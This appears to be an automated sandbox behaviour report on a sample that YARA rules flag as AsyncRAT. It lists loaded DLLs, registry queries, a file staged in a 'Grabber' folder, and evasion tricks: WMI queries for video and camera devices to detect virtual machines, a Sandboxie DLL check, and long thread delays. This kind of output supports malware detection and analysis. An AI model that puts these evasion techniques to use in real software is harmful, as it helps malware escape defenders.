Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

File written: C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Jump to behavior

Source: eEo6DAcnnx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: eEo6DAcnnx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_00F6F130 push 840121C3h; ret	0_2_00F6F139
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_05290538 push eax; ret	0_2_05290545
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_0529EC58 push esp; iretd	0_2_0529EC59
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_05290B10 push E40121D2h; ret	0_2_05290B1D
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_05291794 push eax; iretd	0_2_0529179D

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: eEo6DAcnnx.exe

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Memory allocated: 4C60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596608	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Window / User API: threadDelayed 8270			Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Window / User API: threadDelayed 1573			Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596844s >= -30000s	Jump to behavior
